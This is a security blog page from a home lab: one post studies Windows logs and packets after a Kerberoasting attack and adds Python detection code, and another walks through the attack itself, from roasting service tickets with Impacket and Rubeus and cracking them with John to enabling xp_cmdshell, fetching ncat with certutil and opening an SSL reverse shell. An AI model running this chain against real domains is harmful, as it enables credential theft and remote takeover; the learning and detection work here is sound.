Showing posts with label Kerberos. Show all posts

Sunday, January 2, 2022

Analyzing the logs and packets from a post-Kerberoasting activity

In the previous post, I did the Kerberoasting attack. The log entry at the time of running impacket-mssqlclient did not show me anything that I thought was immediately interesting. Actually, it surprised me instead. I was really hoping to see information such as the Workstation Name, Source Network Address and Source Port, especially since the Logon Type is reported as 3 below.

An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		SECURITYNIK\sql-service
	Account Name:		sql-service
	Account Domain:		SECURITYNIK
	Logon ID:		0x4F4F11
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.
...

Another entry did pique my interest though. Why would sqlservr.exe be spawning cmd.exe with the command line "C:\Windows\system32\cmd.exe" /c whoami? This is definitely more interesting than the above entry.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x123c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c whoami

Next up, we see cmd.exe executing the whoami.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1724
	New Process Name:	C:\Windows\System32\whoami.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x123c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	whoami

Here we see the Domain Admins group being enumerated.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x360
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c net groups "Domain Admins"

Here we see the host downloading ncat.exe via certutil.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1598
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xa04
	Creator Process Name:	C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe

Here is what it looked like when ncat was executed.

A new process has been created.

Creator Subject:
	Security ID:		NT SERVICE\MSSQL$SQLEXPRESS
	Account Name:		MSSQL$SQLEXPRESS
	Account Domain:		NT Service
	Logon ID:		0x1718F

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xc6c
	New Process Name:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1578
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe  10.0.0.107 443 --ssl --exec cmd.exe
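Reading these 4688 entries by hand works for a handful of events; on a busy server you want the parent/child relationship pulled out automatically. The following is an added example (not from the original post) that parses the exported event text, walks the Creator Process ID links, and flags the three things visible above: the database engine spawning a shell, certutil fetching a URL, and ncat being launched with --exec. The event text is a constructed sample modelled on the entries quoted above, and the field regex assumes the "Key: Value" layout of the Event Viewer export.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: 4688 events shaped like the ones quoted in this post
# (sqlservr.exe -> cmd.exe -> whoami, a certutil download, and the ncat launch).
SAMPLE_4688 = r"""
A new process has been created.
Process Information:
    New Process ID:        0x123c
    New Process Name:      C:\Windows\System32\cmd.exe
    Creator Process ID:    0xa04
    Creator Process Name:  C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line:  "C:\Windows\system32\cmd.exe" /c whoami
A new process has been created.
Process Information:
    New Process ID:        0x1724
    New Process Name:      C:\Windows\System32\whoami.exe
    Creator Process ID:    0x123c
    Creator Process Name:  C:\Windows\System32\cmd.exe
    Process Command Line:  whoami
A new process has been created.
Process Information:
    New Process ID:        0x1598
    New Process Name:      C:\Windows\System32\cmd.exe
    Creator Process ID:    0xa04
    Creator Process Name:  C:\Program Files\Microsoft SQL Server\MSSQL13.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
    Process Command Line:  "C:\Windows\system32\cmd.exe" /c certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
A new process has been created.
Process Information:
    New Process ID:        0xc6c
    New Process Name:      C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe
    Creator Process ID:    0x1578
    Creator Process Name:  C:\Windows\System32\cmd.exe
    Process Command Line:  C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe
"""

SPLIT_MARKER = "A new process has been created."
# "Key:   Value" lines of the exported event; the key stops at the first colon.
FIELD_RE = re.compile(r"\s*([A-Za-z ()]+?):\s+(.*?)\s*$")

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DB_ENGINES = {"sqlservr.exe"}
# Command-line patterns: living-off-the-land download and a netcat-style bound shell.
CMDLINE_RULES = [
    ("certutil -urlcache download", re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("netcat launched with --exec/-e", re.compile(r"\bn?cat(\.exe)?\b.*(--exec|\s-e\s)", re.I)),
]


def parse_4688(text):
    """Turn the exported text of 4688 events into a list of field dictionaries."""
    events = []
    for chunk in text.split(SPLIT_MARKER):
        fields = {}
        for line in chunk.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group(1)] = m.group(2)
        if "New Process Name" in fields:
            events.append(fields)
    return events


def basename(path):
    return PureWindowsPath(path).name.lower()


def reasons_for(ev):
    reasons = []
    parent = basename(ev.get("Creator Process Name", ""))
    child = basename(ev["New Process Name"])
    if parent in DB_ENGINES and child in SHELLS:
        reasons.append(f"{parent} spawned {child} (xp_cmdshell-style command execution)")
    for label, pattern in CMDLINE_RULES:
        if pattern.search(ev.get("Process Command Line", "")):
            reasons.append(label)
    return reasons


def process_chain(ev, by_pid):
    """Walk Creator Process ID links back as far as the exported events allow.
    Windows reuses PIDs, so on a real log also compare the event timestamps."""
    chain, cur = [basename(ev["New Process Name"])], ev
    while len(chain) < 10:
        parent = by_pid.get(cur.get("Creator Process ID", "").lower())
        if parent is None:  # parent not in the export: fall back to the recorded name
            chain.append(basename(cur.get("Creator Process Name", "")))
            break
        chain.append(basename(parent["New Process Name"]))
        cur = parent
    return " <- ".join(chain)


def analyze(text):
    events = parse_4688(text)
    by_pid = {ev["New Process ID"].lower(): ev for ev in events}
    findings = []
    for ev in events:
        reasons = reasons_for(ev)
        if reasons:
            findings.append({"chain": process_chain(ev, by_pid),
                             "cmdline": ev.get("Process Command Line", ""),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_4688):
        print(f["chain"], "|", f["cmdline"])
        for r in f["reasons"]:
            print("   ->", r)
```

The whoami event is parsed but not reported: its parent is cmd.exe, and the command line is harmless on its own, so the alert lives with the cmd.exe that sqlservr.exe spawned. Replace SAMPLE_4688 with the contents of an exported Security log to run it against real data.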

While I was looking at the logs to see what transpired, I was also capturing packets using the following:

┌──(root💀securitynik)-[~/packets]
└─# tcpdump -nnt --interface eth0 -w impacket-sql.pcap '(host 10.0.0.5) and not(arp or ip6 or port(1900))' -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C2841 packets captured
2841 packets received by filter
0 packets dropped by kernel

Interestingly, I thought most of the communication was encrypted but I was wrong. As I looked at a few packets, I could see the queries I executed.

Looking at the type of packets captured.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -q -z io,phs

===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:2841 bytes:4068111
  ip                                     frames:2841 bytes:4068111
    tcp                                  frames:2835 bytes:4066653
      tds                                frames:90 bytes:460551
        _ws.malformed                    frames:7 bytes:2500
        tcp.segments                     frames:2 bytes:12052
      tds.prelogin                       frames:1 bytes:320
        tds.prelogin                     frames:1 bytes:320
      data                               frames:135 bytes:8100
      http                               frames:4 bytes:11948
        media                            frames:2 bytes:11564
          tcp.segments                   frames:2 bytes:11564
      tls                                frames:827 bytes:121673
    udp                                  frames:6 bytes:1458
      nbdgm                              frames:6 bytes:1458
        smb                              frames:6 bytes:1458
          mailslot                       frames:6 bytes:1458
            browser                      frames:6 bytes:1458
===================================================================

Looking at the TDS messages, first up the SQL batch messages, "tds.type == 1":

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 1'
   20   9.933875   10.0.0.107 → 10.0.0.5     TDS 316 SQL batch
   24  17.281790   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
   92 973.952996   10.0.0.107 → 10.0.0.5     TDS 170 SQL batch
   96 981.491834   10.0.0.107 → 10.0.0.5     TDS 168 SQL batch
  100 987.357432   10.0.0.107 → 10.0.0.5     TDS 132 SQL batch
  104 996.015944   10.0.0.107 → 10.0.0.5     TDS 138 SQL batch
  ....

Looking at some of the responses, "tds.type == 4":

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y 'tds.type == 4'
    6   0.101021     10.0.0.5 → 10.0.0.107   TDS 91 Response
   15   0.111340     10.0.0.5 → 10.0.0.107   TDS 333 Response[Malformed Packet]
   17   0.129048     10.0.0.5 → 10.0.0.107   TDS 473 Response
   22  10.135335     10.0.0.5 → 10.0.0.107   TDS 666 Response
   26  17.489552     10.0.0.5 → 10.0.0.107   TDS 173 Response
   94 974.032998     10.0.0.5 → 10.0.0.107   TDS 294 Response
  ....

Looking at some of these messages, I see the commands I executed.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r impacket-sql.pcap -Y '(tds.type == 1) || (tds.type == 4)' -T fields -e tds.type -e tds.query -E header=y | more
Running as user "root" and group "root". This could be dangerous.
tds.type        tds.query
4
4
4
1       exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFI
GURE;\r\n
4
1       exec master..xp_cmdshell 'whoami'\r\n
1       exec master..xp_cmdshell 'net users'\r\n
1       exec master..xp_cmdshell 'net groups "Domain Admins"'\r\n
1       exec master..xp_cmdshell 'certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe'\r\n
1       exec master..xp_cmdshell 'cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"'\r\n
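The reason the queries are readable is worth spelling out: when SQL Server is left at its default (encryption available but not forced, ENCRYPT_OFF in the PRELOGIN exchange), only the LOGIN7 packet is protected by TLS and the SQL batches that follow are sent in the clear. Below is an added example, not from the original post, that does by hand what the tds.query field does in tshark: it splits a TCP byte stream into TDS packets, strips the ALL_HEADERS block from a SQL_BATCH message, decodes the UCS-2 query text, and flags batches that touch xp_cmdshell or sp_configure. The byte stream is constructed inline with the helper at the top; the ALL_HEADERS detection is a heuristic (first header is the 18-byte transaction descriptor, type 0x0002) and assumes TDS 7.2 or later.

```python
import struct

TDS_SQL_BATCH, TDS_RESPONSE = 0x01, 0x04
EOM = 0x01  # status bit: last packet of a message


def build_sql_batch(sql, spid=51, packet_id=1):
    """Construct a TDS 7.2+ SQL_BATCH packet (used only to build the sample stream)."""
    # ALL_HEADERS: DWORD TotalLength, then one Transaction Descriptor header:
    # DWORD HeaderLength=18, USHORT HeaderType=0x0002, ULONGLONG TransactionDescriptor,
    # DWORD OutstandingRequestCount.
    txn_header = struct.pack("<IHQI", 18, 0x0002, 0, 1)
    all_headers = struct.pack("<I", 4 + len(txn_header)) + txn_header
    payload = all_headers + sql.encode("utf-16-le")
    # 8-byte packet header: Type, Status, Length (BE), SPID (BE), PacketID, Window.
    return struct.pack(">BBHHBB", TDS_SQL_BATCH, EOM, 8 + len(payload), spid, packet_id, 0) + payload


def build_response(tokens, spid=51):
    return struct.pack(">BBHHBB", TDS_RESPONSE, EOM, 8 + len(tokens), spid, 1, 0) + tokens


# Constructed sample stream: the batches impacket-mssqlclient sent in this post, with a
# dummy DONE token as the server response in between. Real data would come from the pcap.
SAMPLE_STREAM = (
    build_sql_batch("select @@version\r\n")
    + build_response(b"\xfd\x10\x00\xc1\x00\x01\x00\x00\x00\x00\x00\x00\x00")
    + build_sql_batch("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
                      "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;\r\n")
    + build_sql_batch("exec master..xp_cmdshell 'whoami'\r\n")
)


def parse_tds_packets(data):
    """Split a TCP byte stream into (type, status, spid, payload) tuples."""
    packets, off = [], 0
    while off + 8 <= len(data):
        ptype, status, length, spid, _pkt_id, _window = struct.unpack_from(">BBHHBB", data, off)
        if length < 8 or off + length > len(data):
            raise ValueError(f"truncated or malformed TDS packet at offset {off}")
        packets.append((ptype, status, spid, data[off + 8:off + length]))
        off += length
    return packets


def sql_batch_text(payload):
    """Extract the query text from a SQL_BATCH payload, skipping ALL_HEADERS when present."""
    text_off = 0
    if len(payload) >= 22:
        total_len, hdr_len, hdr_type = struct.unpack_from("<IIH", payload, 0)
        # Heuristic: TDS 7.2+ batches open with ALL_HEADERS whose first header is the
        # 18-byte transaction descriptor (type 0x0002).
        if total_len <= len(payload) and hdr_len == 18 and hdr_type == 0x0002:
            text_off = total_len
    return payload[text_off:].decode("utf-16-le", errors="replace")


def extract_batches(data):
    """Reassemble SQL_BATCH messages (possibly spanning several packets) into query strings."""
    batches, buf = [], b""
    for ptype, status, _spid, payload in parse_tds_packets(data):
        if ptype != TDS_SQL_BATCH:
            continue
        buf += payload
        if status & EOM:
            batches.append(sql_batch_text(buf))
            buf = b""
    return batches


# Procedures and statements that turn a SQL login into command execution or file access.
RISKY = ("xp_cmdshell", "sp_configure", "sp_oacreate", "openrowset", "bulk insert")


def risky_batches(data):
    """Return (query, matched keywords) for every batch that touches a risky feature."""
    flagged = []
    for sql in extract_batches(data):
        hits = [kw for kw in RISKY if kw in sql.lower()]
        if hits:
            flagged.append((sql, hits))
    return flagged


if __name__ == "__main__":
    for sql, hits in risky_batches(SAMPLE_STREAM):
        print(hits, "<-", sql.strip())
```

On a real capture the same logic applies to the TCP payload of the client-to-server direction once the TLS-wrapped login has completed; if the server has Force Encryption enabled, nothing after the PRELOGIN exchange is parseable this way, which is the configuration to aim for.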

I was able to see the responses also. However, in most cases it does not really make sense to post them here.

Ok, that's it for me and this post.

Beginning Kerberoasting

In Kerberoasting, we leverage the fact that the requested service ticket is encrypted with a key derived from the password of the service account that the service runs as. Therefore, the objective is to request a ticket for that service and then crack the service account's password so that the service's credential can be reused.

First up, using the account from the AS-REP Roasting post which was just completed, query the domain for SPNs using impacket-GetUserSPNs.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL                              
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName                     Name              MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------------------------  ----------------  --------  --------------------------  --------------------------  ----------
cifs/cifs.securitynik.local              cifs-service                2021-11-10 21:33:08.377237  <never>                                
HTTP/http.securitynik.local:80           http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http                                http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/http.securitynik.local              http-spn                    2021-11-08 21:32:04.867511  <never>                                
HTTP/www.securitynik.local               kerberos-service            2021-10-22 22:34:26.733216  <never>                                
MSSQLSvc/dc-2019.securitynik.local:1433  sql-service                 2021-11-16 04:58:08.706286  2021-11-16 17:30:56.779153 

Requesting a service ticket for the account with the SPN MSSQLSvc/dc-2019.securitynik.local:1433.

┌──(root💀securitynik)-[~/packets]
└─# impacket-GetUserSPNs securitynik.local/neysa:Testing1 -target-domain SECURITYNIK.LOCAL -request -outputfile GetUserSPNs.hashes

Alternatively, leveraging Rubeus to grab the tickets from a Windows host.

C:\Tools>Rubeus.exe kerberoast /domain:securitynik.local /outfile:kerberoasting.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : securitynik.local
[*] Searching path 'LDAP://securitynik.local/DC=securitynik,DC=local' for Kerberoastable users

[*] Total kerberoastable users : 4


[*] SamAccountName         : cifs-service
[*] DistinguishedName      : CN=cifs Service,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : cifs/cifs.securitynik.local
[*] PwdLastSet             : 11/11/2021 2:33:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : http-spn
[*] DistinguishedName      : CN=HTTP SPN,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/http.securitynik.local:80
[*] PwdLastSet             : 11/9/2021 2:32:04 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : kerberos-service
[*] DistinguishedName      : CN=Kerberos Service,CN=Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : HTTP/www.securitynik.local
[*] PwdLastSet             : 10/23/2021 2:34:26 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash written to C:\Tools\kerberoasting.hashes


[*] SamAccountName         : sql-service
[*] DistinguishedName      : CN=SERVICE,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dc-2019.securitynik.local:1433
[*] PwdLastSet             : 11/16/2021 9:58:08 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\kerberoasting.hashes

[*] Roasted hashes written to : C:\Tools\kerberoasting.hashes
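Rubeus' notice above is the detection hook on the defensive side: a TGS-REQ that asks for an RC4 (etype 0x17) ticket for an account that supports AES, or one principal pulling service tickets for every SPN-bearing account within a few seconds, both stand out in event 4769 on the domain controllers. The following is an added example (not part of the original post) that applies both checks to a handful of constructed 4769 records. The supported-etype lookup table is built from the Rubeus output above; the timestamps and client addresses are hypothetical, and in a real pipeline the records would come from the Security log rather than an inline list.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17
AES_ETYPES = {0x11, 0x12}  # AES128/AES256-CTS-HMAC-SHA1-96

# Constructed lookup: the "Supported ETypes" Rubeus reported for each service account above.
ACCOUNT_ETYPES = {
    "cifs-service": {RC4_HMAC},
    "http-spn": {RC4_HMAC},
    "kerberos-service": {0x11, 0x12},
    "sql-service": {RC4_HMAC},
}


def ts(s):
    return datetime.fromisoformat(s)


# Constructed 4769 records, already reduced to the fields that matter. Times are hypothetical.
SAMPLE_4769 = [
    {"time": ts("2021-11-17T22:10:00"), "account": "neysa@SECURITYNIK.LOCAL", "service": "cifs-service", "etype": 0x17, "client": "10.0.0.107"},
    {"time": ts("2021-11-17T22:10:01"), "account": "neysa@SECURITYNIK.LOCAL", "service": "http-spn", "etype": 0x17, "client": "10.0.0.107"},
    {"time": ts("2021-11-17T22:10:01"), "account": "neysa@SECURITYNIK.LOCAL", "service": "kerberos-service", "etype": 0x12, "client": "10.0.0.107"},
    {"time": ts("2021-11-17T22:10:02"), "account": "neysa@SECURITYNIK.LOCAL", "service": "sql-service", "etype": 0x17, "client": "10.0.0.107"},
    {"time": ts("2021-11-17T22:30:00"), "account": "nakia@SECURITYNIK.LOCAL", "service": "DC-2019$", "etype": 0x12, "client": "10.0.0.108"},
    {"time": ts("2021-11-17T23:05:00"), "account": "neysa@SECURITYNIK.LOCAL", "service": "kerberos-service", "etype": 0x17, "client": "10.0.0.107"},
]


def rc4_downgrades(events, supported=ACCOUNT_ETYPES):
    """RC4 service tickets issued for accounts that support AES (the forced-RC4 case)."""
    return [ev for ev in events
            if ev["etype"] == RC4_HMAC and supported.get(ev["service"], set()) & AES_ETYPES]


def rc4_only_accounts(supported=ACCOUNT_ETYPES):
    """Service accounts whose only supported etype is RC4: the cheapest tickets to crack."""
    return sorted(acct for acct, etypes in supported.items() if etypes == {RC4_HMAC})


def tgs_bursts(events, window=timedelta(seconds=60), threshold=3):
    """One (account, client) pair requesting tickets for many distinct services in a short window."""
    grouped = defaultdict(list)
    for ev in events:
        # krbtgt and machine accounts produce service tickets constantly; skip them.
        if ev["service"].lower() == "krbtgt" or ev["service"].endswith("$"):
            continue
        grouped[(ev["account"], ev["client"])].append(ev)
    hits = []
    for (account, client), evs in grouped.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            services = {e["service"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(services) >= threshold:
                hits.append({"account": account, "client": client,
                             "first_seen": start["time"], "services": sorted(services)})
                break  # one alert per (account, client) is enough
    return hits


if __name__ == "__main__":
    print("RC4-only service accounts:", rc4_only_accounts())
    for ev in rc4_downgrades(SAMPLE_4769):
        print("RC4 ticket for AES-capable account:", ev["service"], "requested by", ev["account"])
    for hit in tgs_bursts(SAMPLE_4769):
        print("TGS burst:", hit["account"], "from", hit["client"], "->", hit["services"])
```

The three RC4-only accounts in the lookup are the real finding here: the fix that removes the cheap cracking path is moving those service accounts to AES keys (msDS-SupportedEncryptionTypes) with long, random passwords, or to group managed service accounts, after which only the downgrade check remains useful.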

Now that we have the hashes from two different tools, I will take the one from impacket-GetUserSPNs and feed it to John.

┌──(root💀securitynik)-[~/packets]
└─# john GetUserSPNs.hashes 
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Testing1         (?)
Testing1         (?)
Testing1         (?)
Testing1         (?)
4g 0:00:00:00 DONE 2/3 (2021-11-17 22:18) 50.00g/s 198400p/s 793600c/s 793600C/s Tara1..Smurfy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John returned the passwords but I'm not sure why it has the (?). 

Leveraging the password Testing1 with the username sql-service against MSSQLSvc/dc-2019.securitynik.local:1433. We need to target the service that runs under that account; in this case, the service is MSSQL. Let's leverage the Impacket suite once again, this time using impacket-mssqlclient to target the MSSQL service.

┌──(root💀securitynik)-[~]
└─# impacket-mssqlclient securitynik.local/sql-service:Testing1@10.0.0.5 -windows-auth
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC-2019\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162) 
[!] Press help for extra shell commands
SQL> 

Now that we are in, let's get some help.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 

Let's execute enable_xp_cmdshell.

SQL> enable_xp_cmdshell
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC-2019\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

Let's now run a few commands.

SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

nt service\mssql$sqlexpress                                                        

NULL    

Running something more meaningful.

SQL> xp_cmdshell net groups "Domain Admins"
output                                                                             

--------------------------------------------------------------------------------   

Group name     Domain Admins                                                       

Comment        Designated administrators of the domain                             

NULL                                                                               

Members                                                                            

NULL                                                                               

-------------------------------------------------------------------------------    

3202357359SA             admin                    Administrator                    

ANGELINE_WHITAKER        CARMEN_DURAN             DOREEN_MORIN                     

JACKSON_SOSA             LOUISA_MCPHERSON         MISTY_CALHOUN                    

mysqlsvc                                                                           

The command completed successfully.                                                

NULL                                                                               

NULL   

That is all interesting so far. Let's get an ncat shell back to my attacking machine.

First up, let's set up a web server to host ncat.exe.

┌──(root💀securitynik)-[~]
└─# cd /home/securitynik/WinTools/

┌──(root💀securitynik)-[~/WinTools]
└─# ls ncat.exe
ncat.exe

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Using certutil to download ncat.exe.

SQL> xp_cmdshell certutil -URLCache -F http://10.0.0.107/ncat.exe %TEMP%\ncat.exe
output                                                                   
--------------------------------------------------------------------------------   

****  Online  ****                                                                 

CertUtil: -URLCache command completed successfully.                                

NULL                                

Confirming on our attacking machine that the file was successfully downloaded.

┌──(root💀securitynik)-[~/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.5 - - [18/Nov/2021 02:29:41] "GET /ncat.exe HTTP/1.1" 200 -

Next, set up an ncat listener on our attacking machine, allowing only the compromised machine to connect. We are also going to take advantage of SSL to hide our activities while blending in.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443

Connecting from the compromised machine.

SQL> xp_cmdshell cmd.exe /c "%temp%\ncat.exe 10.0.0.107 443 --ssl --exec cmd.exe"

Looking at the ncat listener, we now have a shell.

┌──(root💀securitynik)-[~]
└─# ncat --verbose --listen 443 -4 --ssl  --allow 10.0.0.5
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:64218.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

That is good enough for me. Time to move on. I believe I have improved my knowledge about Kerberoasting.

Beginning AS-REP Roasting with Impacket and Rubeus

